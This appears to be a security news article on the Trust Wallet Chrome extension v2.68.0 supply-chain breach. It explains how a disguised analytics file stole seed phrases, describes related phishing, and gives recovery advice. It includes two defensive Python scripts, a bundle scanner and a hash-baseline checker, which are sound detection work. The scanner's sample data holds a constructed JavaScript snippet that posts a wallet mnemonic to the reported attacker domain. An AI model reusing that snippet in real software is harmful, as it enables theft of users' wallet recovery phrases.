Trust Wallet Chrome Extension Breach Drains Over $7 Million

A major security incident has impacted Trust Wallet users, after a malicious update to the Chrome browser extension resulted in the theft of more than $7 million in cryptocurrency.

The breach was traced to Trust Wallet Chrome extension version 2.68.0, released on December 24, 2025, and affected hundreds of desktop users. Mobile wallet users were not impacted.

The incident highlights the growing risk of supply-chain attacks targeting browser-based crypto wallets, where automatic updates can silently introduce malicious code.


How the Attack Was Discovered

Renowned blockchain investigator ZachXBT was the first to publicly flag the incident on X, noting a sudden spike in unauthorized outflows shortly after users interacted with the updated extension.

By Christmas Eve, social media and community channels were flooded with reports of:

  • Completely drained wallets
  • Losses across ETH, BTC, SOL, and BNB
  • Transactions routed to multiple attacker-controlled addresses

One victim reported losing $300,000 within minutes after approving a routine authorization request.

Blockchain security firm PeckShield initially estimated losses at $6 million. Trust Wallet later confirmed that approximately $7 million was stolen across hundreds of compromised wallets.


Supply-Chain Compromise Confirmed

Security firm SlowMist issued an alert suggesting a supply-chain attack, where malicious code was injected upstream and distributed through the official Chrome Web Store.

The timing strongly aligned with the extension update, confirming that version 2.68.0 was the sole affected release.


Malicious Code Analysis

Researchers analyzing the compromised bundle uncovered an obfuscated JavaScript file named 4482.js, disguised as a PostHog analytics component.

Key findings include:

  • The script activated when users imported seed phrases
  • It silently exfiltrated recovery phrases and wallet data
  • Data was sent to api.metrics-trustwallet.com, a domain:
    • Registered only days earlier
    • Designed to mimic legitimate Trust Wallet infrastructure
    • Unrelated to official Trust Wallet systems per WHOIS records

This mechanism allowed attackers to drain wallets immediately after seed import, without further user interaction.
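The indicators described above (a file posing as telemetry, seed-phrase handling in the same code as an outbound request, and a look-alike host that carries the brand name but is not the vendor's own domain) can be triaged statically before an extension is trusted. The script below is an added example and is not Trust Wallet code or a reconstruction of the real 4482.js: it scans an unpacked extension bundle for those three signals. The allowlist (`trustwallet.com`), the sample files it builds, and the regular expressions are assumptions for the demonstration.

```python
"""Static triage of an unpacked browser-extension bundle for seed-phrase
exfiltration indicators (added example, not the project's own code)."""
from __future__ import annotations

import re
from pathlib import Path

# Hosts the extension is expected to contact. Constructed allowlist for the
# example; in practice derive it from the vendor's documented endpoints.
ALLOWED_HOSTS = {"trustwallet.com"}
BRAND = "trustwallet"

URL_RE = re.compile(r"https?://([A-Za-z0-9.-]+)")
SEED_RE = re.compile(r"mnemonic|seed\s*phrase|recovery\s*phrase|secret\s*phrase", re.I)
SINK_RE = re.compile(r"\bfetch\s*\(|XMLHttpRequest|sendBeacon\s*\(|new\s+Image\s*\(")


def host_allowed(host: str, allowed: set[str]) -> bool:
    """True if host is an allowed domain or a subdomain of one.
    'api.metrics-trustwallet.com' does NOT end with '.trustwallet.com'."""
    return any(host == a or host.endswith("." + a) for a in allowed)


def scan_bundle(files: dict[str, str], allowed: set[str] = ALLOWED_HOSTS,
                brand: str = BRAND) -> list[dict]:
    """Scan {relative_path: source_text} and return a list of findings."""
    findings = []
    for path, text in sorted(files.items()):
        for host in sorted({h.lower() for h in URL_RE.findall(text)}):
            if host_allowed(host, allowed):
                continue
            # A host containing the brand name but absent from the allowlist is
            # the look-alike pattern used to blend exfiltration into telemetry.
            kind = "brand_lookalike_host" if brand in host else "unlisted_host"
            findings.append({"file": path, "kind": kind, "detail": host})
        seed = SEED_RE.search(text)
        sink = SINK_RE.search(text)
        if seed and sink:
            findings.append({
                "file": path,
                "kind": "seed_handling_with_network_sink",
                "detail": f"{seed.group(0)!r} and {sink.group(0).strip()!r} in same file",
            })
    return findings


def scan_directory(root: str | Path) -> list[dict]:
    """Read every .js/.json file under an unpacked extension directory and scan it."""
    root = Path(root)
    files = {
        str(p.relative_to(root)): p.read_text(encoding="utf-8", errors="replace")
        for p in root.rglob("*") if p.suffix in {".js", ".json"}
    }
    return scan_bundle(files)


def build_sample_bundle() -> dict[str, str]:
    """Constructed sample bundle: benign files plus one that mirrors the
    behaviour reported for 4482.js (a 'telemetry' shim posting the mnemonic)."""
    return {
        "manifest.json": '{"name": "Sample Wallet", "version": "0.0.0"}',
        "background.js": 'fetch("https://api.trustwallet.com/v1/prices").then(r => r.json());',
        "popup.js": 'const words = document.getElementById("mnemonic").value; restore(words);',
        "4482.js": (
            "// posthog analytics shim (constructed stand-in, not the real file)\n"
            "function capture(wallet) {\n"
            "  const phrase = wallet.mnemonic;\n"
            '  fetch("https://api.metrics-trustwallet.com/collect", {\n'
            '    method: "POST", body: JSON.stringify({ m: phrase })\n'
            "  });\n"
            "}\n"
        ),
    }


if __name__ == "__main__":
    # Run against the constructed bundle; use scan_directory(path) on a real one.
    for f in scan_bundle(build_sample_bundle()):
        print(f"{f['file']}: {f['kind']} ({f['detail']})")
```

The popup file legitimately handles the mnemonic but has no network sink, and the background file talks to the allowlisted host, so only the injected file is flagged. Obfuscated bundles may hide the URL or the keyword behind string construction, so treat a clean result as a screen, not a clearance, and pair it with a review of the manifest's host permissions.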


Parallel Phishing Campaigns Increased Losses

Attackers also launched coordinated phishing operations to capitalize on panic:

  • Fake domains like fix-trustwallet.com posed as “emergency fixes”
  • Victims were prompted to re-enter seed phrases
  • Wallets were drained instantly after submission

Investigators noted that multiple phishing domains shared the same registrar, indicating a well-organized and multi-pronged attack.


Trust Wallet’s Response

Trust Wallet acknowledged the breach on December 25, 2025, confirming:

  • The issue was isolated to Chrome extension v2.68.0
  • Users were urged to disable the extension immediately
  • Version 2.69 was released as the only safe version

How Users Were Instructed to Respond

  1. Navigate to:
    chrome://extensions/?id=egjidjbpglichdcondbcbdnbeeppgdph
  2. Disable the Trust Wallet extension
  3. Enable Developer Mode
  4. Update to version 2.69

Trust Wallet also pledged to fully refund affected users, initiated direct support outreach, and warned users to ignore unofficial DMs or third-party “support” messages.


Industry Reaction and Ongoing Investigation

The incident drew attention from industry leaders, including Binance co-founder Changpeng Zhao, who hinted at possible insider involvement, further intensifying scrutiny of the wallet’s security practices.

The stolen funds span EVM chains, Bitcoin, and Solana, with attackers reportedly laundering assets through mixers, complicating recovery efforts.


What Users and Security Teams Should Do

Cybersecurity experts recommend immediate action for potentially exposed users:

  • Assume all imported seed phrases are compromised
  • Create new wallets with fresh seed phrases
  • Transfer remaining funds immediately
  • Avoid browser extensions for long-term storage
  • Verify extension updates and permissions carefully

For developers and security teams, the breach reinforces the need for:

  • Stronger extension supply-chain controls
  • Reproducible builds and integrity verification
  • Reduced reliance on auto-update mechanisms for sensitive software
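One concrete form of the integrity verification called for above is a pinned per-file hash baseline: hash every file of a release you have reviewed, store the hashes, and compare any later installed copy against them so that a silently added or altered file (the shape of the 4482.js injection described earlier) is reported before the extension is loaded. The code below is an added example, not a Trust Wallet tool; the sample trees it compares are constructed and do not correspond to real release contents.

```python
"""Pinned-baseline integrity check for an unpacked extension directory
(added example; the sample file trees are constructed)."""
from __future__ import annotations

import hashlib
import json
from pathlib import Path


def hash_tree(files: dict[str, bytes | str]) -> dict[str, str]:
    """Map each relative path to the SHA-256 hex digest of its contents."""
    out = {}
    for path, data in files.items():
        if isinstance(data, str):
            data = data.encode("utf-8")
        out[path] = hashlib.sha256(data).hexdigest()
    return out


def read_tree(root: str | Path) -> dict[str, bytes]:
    """Load every file under root, keyed by POSIX-style relative path."""
    root = Path(root)
    return {
        p.relative_to(root).as_posix(): p.read_bytes()
        for p in sorted(root.rglob("*")) if p.is_file()
    }


def compare(baseline: dict[str, str], current: dict[str, str]) -> dict:
    """Diff two hash maps; 'ok' is True only when nothing changed."""
    added = sorted(set(current) - set(baseline))
    removed = sorted(set(baseline) - set(current))
    modified = sorted(p for p in set(baseline) & set(current)
                      if baseline[p] != current[p])
    return {"ok": not (added or removed or modified),
            "added": added, "removed": removed, "modified": modified}


def write_baseline(root: str | Path, out_file: str | Path) -> None:
    """Record the hashes of a reviewed build as the pinned baseline."""
    Path(out_file).write_text(
        json.dumps(hash_tree(read_tree(root)), indent=2, sort_keys=True))


def verify_directory(root: str | Path, baseline_file: str | Path) -> dict:
    """Compare an installed copy against the pinned baseline."""
    baseline = json.loads(Path(baseline_file).read_text())
    return compare(baseline, hash_tree(read_tree(root)))


def sample_baseline() -> dict[str, str]:
    """Constructed known-good tree (hypothetical release, not real files)."""
    return {"manifest.json": '{"version": "0.0.1"}', "background.js": "init();\n"}


def sample_updated() -> dict[str, str]:
    """Constructed later tree: one file altered, one 'telemetry' file added."""
    return {
        "manifest.json": '{"version": "0.0.1"}',
        "background.js": "init();\nimport('./4482.js');\n",
        "4482.js": "// constructed stand-in for an injected file\n",
    }


if __name__ == "__main__":
    report = compare(hash_tree(sample_baseline()), hash_tree(sample_updated()))
    print(json.dumps(report, indent=2))
    # On a real install: write_baseline(reviewed_dir, "baseline.json") once,
    # then verify_directory(installed_dir, "baseline.json") after each update.
```

The baseline is only as trustworthy as the build it was taken from, which is why this check belongs with reproducible builds: if the hashes come from an independently reproduced build rather than from the published package, a malicious upstream release cannot also supply a matching baseline.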

Why This Breach Matters

This incident underscores a harsh reality: browser-based crypto wallets are high-value targets, and supply-chain compromises can bypass even cautious users.

With over $3 billion lost to crypto hacks in 2025, the Trust Wallet breach is a stark reminder that convenience and security often sit in tension—especially in decentralized ecosystems.

Trust Wallet’s refund process will be closely watched as a test of user trust following one of the most impactful wallet extension compromises to date.


Key Takeaways

  • Trust Wallet Chrome extension v2.68.0 was compromised
  • Over $7 million stolen across hundreds of wallets
  • Malicious code exfiltrated seed phrases during import
  • Parallel phishing campaigns amplified losses
  • Users must upgrade to v2.69 and rotate compromised keys